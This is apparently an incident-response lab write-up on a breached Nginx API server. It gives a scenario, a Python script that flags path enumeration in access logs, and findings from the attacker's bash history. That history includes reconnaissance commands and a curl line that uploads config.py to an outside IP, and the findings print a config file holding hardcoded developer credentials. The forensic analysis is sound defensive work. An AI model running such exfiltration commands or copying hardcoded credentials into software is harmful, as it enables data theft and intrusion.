IR LAB

Objective: Analyze the access logs of a compromised Nginx web server. Can you correctly identify the method of enumeration and initial exploitation by the attacker?

Scenario

“This is our third breach for this year: we see strange web requests in Nginx logs, then some unexpected changes in system files, and after a few days, we see our data in Telegram! We tried cleaning infected files, but hackers are always one step forward.”

“Yesterday, we observed a similar web scan on our newly deployed API server, and suspect it might be the same threat actors. We quickly isolated the server from the network and desperately hope for your help!”
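As an added example (not part of the lab notes or the affected system), the following Python script parses Nginx combined-format access logs, groups requests per client and flags the file/path enumeration pattern the scenario describes, listing the probed paths that answered 200 as candidate entry points. The log lines, IPs, paths and thresholds in it are constructed for illustration, not taken from the compromised server.

```python
import re
from collections import defaultdict

# Nginx "combined" log format: ip - user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not from the lab): one scanner, one ordinary API client.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:09:14:01 +0000] "GET /.env HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:14:01 +0000] "GET /config.py HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:14:02 +0000] "GET /admin HTTP/1.1" 404 153 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:14:02 +0000] "GET /api/v1/users HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.20 - - [10/Mar/2024:09:15:10 +0000] "GET /api/v1/users HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:09:15:12 +0000] "POST /api/v1/login HTTP/1.1" 200 87 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_enumerators(log_text, min_paths=3, min_404_ratio=0.5):
    """Flag client IPs that probed many distinct paths with a high 404 share,
    the usual signature of file/directory enumeration. For each flagged IP,
    return the paths that answered 200: those are the candidate entry points."""
    per_ip = defaultdict(lambda: {"paths": set(), "requests": 0, "not_found": 0, "hits": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:          # skip lines in another format rather than crash
            continue
        e = per_ip[rec["ip"]]
        e["requests"] += 1
        e["paths"].add(rec["path"])
        if rec["status"] == "404":
            e["not_found"] += 1
        elif rec["status"] == "200":
            e["hits"].add(rec["path"])
    flagged = {}
    for ip, e in per_ip.items():
        if len(e["paths"]) >= min_paths and e["not_found"] / e["requests"] >= min_404_ratio:
            flagged[ip] = {"paths": len(e["paths"]), "not_found": e["not_found"],
                           "hits": sorted(e["hits"])}
    return flagged

if __name__ == "__main__":
    for ip, info in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {info['paths']} paths, {info['not_found']} x 404, 200 on {info['hits']}")
```

Run it against a real access.log by reading the file into `find_enumerators`; tune `min_paths` and `min_404_ratio` to the server's normal traffic so legitimate clients with a few stale links are not flagged.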

Creds


Key Findings:

Initial Access

Artifact #1: Bash History

id
id
uname -a
ls -la /etc
ls -la
cd apiservice/
ls
cat main.py 
cd src/
ls
cat api.py 
cat config.py 
curl --upload-file config.py http://5.230.66.147/me7d6bd4beh4ura8/upload
exit
sudo su
clear

config.py (the dev's credentials were never changed after deployment)

dev@prod-web-003:~/apiservice/src$ cat config.py
class config:
    API_HOST = "0.0.0.0"
    API_PORT = 8081

    # TODO: Implement some authentication
    # API_USER = "dev"
    # API_PASS = "d3v-p455w0rd"